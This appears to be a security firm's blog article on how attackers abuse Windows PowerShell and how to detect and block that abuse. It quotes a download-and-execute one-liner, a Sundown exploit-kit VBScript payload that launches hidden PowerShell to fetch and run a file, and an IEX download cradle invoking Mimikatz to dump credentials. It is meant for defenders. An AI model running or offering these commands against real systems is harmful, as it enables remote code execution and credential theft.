TWO PHASES OF POWER SHELL—OFFENSIVE AND DEFENSIVE
Power Shell is a command line shell and powerful scripting language used on Windows computers. It has been around for more than 10 years, is used mainly by system administrators, and will replace the default command prompt on Windows in the future.
Power Shell scripts are mostly used in legitimate administration work. They can also be used to protect computers from attacks and perform analysis. However, attackers are also working with Power Shell to create their own threats.
Windows power shell let you access data stores such as registry and certificate store and has a rich expression parser
VERSIONS OF POWER SHELL
WINDOWS VERSION DEFAULT POWER SHELL VERSION
WINDOWS 7 SP1 2.0
WINDOWS 8 3.0
WINDOWS 8.1 4.0
WINDOWS 10 5.0
WINDOWS SERVER 2008 R2 2.0
WINDOWS SERVER 2012 3.0
WINDOWS SERVER 2012 R2 4.0
WINDOWS SERVER 2016 5.1
Here is the documentation which is provided by the Microsoft
Windows Power Shell provides some incredible features:
- cmdlets for doing some common system administration works such as manage registry, services, processes, and event logs using WMI
- Powerful object manipulation capabilities.
- Extensible interface
- Simple command-based navigation , let the users to navigate the registry and other data
- Consistent design.
POWER SHELL INTEGRATED SCRIPTING ENVIRONMENT:
windows power shell integrated scripting environment is a host application that enables you to write and test the scripts and modules in a graphical environment.
WHY ARE ATTACKERS USING POWER SHELL?
- It is installed by default on all new Windows computers.
- It can execute payloads directly from memory, making it stealthy.
- It generates few traces by default, making it difficult to find under forensic analysis.
- It has remote access capabilities by default with encrypted traffic.
- As a script, it is easy to obfuscate and difficult to detect with traditional security tools.
- Defenders often overlook it when hardening their systems.
- It can bypass application-white listing tools depending on the configuration.
- Many gateway sandboxes do not handle script-based malware well.
- It has a growing community with ready available scripts.
- Many system administrators use and trust the framework, allowing Power Shell malware to blend in with regular administration work.
SCRIPT EXECUTION
In the majority of instances, Power Shell scripts are used post-ex-exploitation as down loaders for additional payloads. While the Restricted execution policy prevents users from running Power-Shell scripts with the .ps1 extension, attackers can use other Extensions to allow their scripts to be executed.
In malicious PowerShell scripts, the most frequently used commands and functions on the command line are:
→ (New-Object System.Net.Webclient).DownloadString()
→ (New-Object System.Net.Webclient).DownloadFile()
→ -IEX / -Invoke-Expression
→ Start-Process
A typical command to download and execute a remote file looks
like the following:
powershell.exe (New-Object System.Net.WebClient). DownloadFile($URL,$LocalFileLocation);Start-Process $LocalFileLocation
EXPLOITS
Exploit kits have also been experimenting with Power Shell.
Recently, Sundown exploit kits taking advantage of the Microsoft Internet
Explorer Scripting Engine Remote Memory Corruption Vulnerability (CVE-2016-0189). These attacks impact a flaw in the Jscript and VBScript engines to execute code in Internet Explorer. The following is an example of this script.
set shell=createobject(“Shell.Application”)
shell.ShellExecute “powershell.exe”, “-nop -w hidden -c if(IntPtr]::Size -eq 4){b=’powershell.exe’}else{$b=$env:windir+’\\\\syswow64\\\\
WindowsPowerShell\\\\v1.0\\\\powershell.exe’};
$s=New-Object System.Diagnostics.ProcessStartInfo;$s. FileName=$b;$s.Arguments=’-nop -w hidden -c Import-Module BitsTransfer;Start-BitsTransfer “ &nburl&”c:\\”&nbExe&”;Invoke-Item c:\\”&nbExe&”;’;$s.UseShellExecute=$false;$p=[System.Diagnostics.Process]::Start($s); “,””,”open”,0
SECURING WINDOWS WORKSTATIONS FROM POWER SHELL ATTACKS
Running free and near-free Microsoft tools to improve windows security
- Launch Microsoft AppLocker to lock down what can run on the system
- Launch LAPS to manage local admin password
Disable windows legacy & typically unused features
- Disable WPAD
- Disable LLMNR
- Disable NetBIOS
- Make sure Widgets is disabled
Enable LSA protection
The Local Security Authority Server Service process validate user for local and remote sign-ins and enforces local security policies
Disabling net session enumeration
It helps to remove the capability for any user to enumerate net session info
This process can be done by following steps:
- Open Group Policy Management Console → right click on GPO(Group Policy object) this should contain new preference item and click Edit
- Expand the Preference folder present under console tree Computer Configuration and then expand Windows Settings folder
- Right click on Registry node → new → Registry Wizard
- Select reference workstation and then click next
- Browse to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\
- Select check box for SrvsvcSessioninfo from which you want to create registry preference
- Select check box foam a key only if you want to create a registry item for the key rather than for a value within the key
- Finally click finish
Disable net Bios
Go to properties in network devices → TCPIPV4 properties → Advanced → WINS → disable NetBIOS over TCP/IP
Disable unnecessary services that on Windows Server 2016 Desktop Experience (based on MS Security Blog recommendations)
Script can be found in following link given:
List of awesome Security Hardening techniques for Windows
DETECT AND MITIGATE POWER SHELL ATTACKS
Power Shell has become a major threat against windows platform. There are some way to mitigate and detect PowerShell attacks.
USING APP LOCKER:
App Locker is present in windows 10 enterprise which provides a feature to white list the applications and scripts . When a user creates an App Locker policy they can apply to files, executable s, packaged apps and scripts
DETECT MALICIOUS POWER SHELL WITH SCRIPT BLOCK LOGGING:
In Power Shell version 5 has given new several way to find malicious Power Shell. One way to find using script block logging. This feature of logging is on by default with Power Shell version 5 and it gives a clear text logging of scripts which is executed by Power Shell.
Let’s say an attacker may try to hide their scripts
power shell “IEX (New-Object Net.WebClient).DownloadString(‘http://is.gd/oeoFuI’); Invoke-Mimikatz -DumpCreds”
The attacker can able to create the same command into encoded format using Out-Encoded Command
But the Power Shell event logs can able to see exactly what hacker run
DISABLING THE POWER SHELL FEATURE
if a user’s has no work with PowerShell , they can disable the Power Shell feature to secure from Power Shell script injection.
Way to disable the Power Shell feature :
First removing all users from those folders. You can easily re-enable it by adding a user.
C:\Program Files (x86)\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
C:\Program Files\WindowsPowerShell
C:\Windows\System32\WindowsPowerShell
C:\Windows\SysWOW64\WindowsPowerShell
we definitely have to disable Windows Script Host (used for executing scripts via .JS, .JSE, .VBS, .VBE)
reg add “HKCU\Software\Microsoft\Windows Script Host\Settings” /v “Enabled” /t REG_DWORD /d “0” /f
reg add “HKLM\Software\Microsoft\Windows Script Host\Settings” /v “Enabled” /t REG_DWORD /d “0” /f
reg add “HKCU\Software\Microsoft\Windows Script Host\Settings” /v “Enabled” /t REG_DWORD /d “0” /f
reg add “HKLM\Software\Microsoft\Windows Script Host\Settings” /v “Enabled” /t REG_DWORD /d “0” /f
CONCLUSION
If every hackers turns Power Shell into deadly weapon, it’s difficult for user to mitigate. So users has to study about Power Shell and defend your system before attacker gets in. so be prepare and be secure. For effective audit for windows Microsoft environment get in touch with us.
Posts
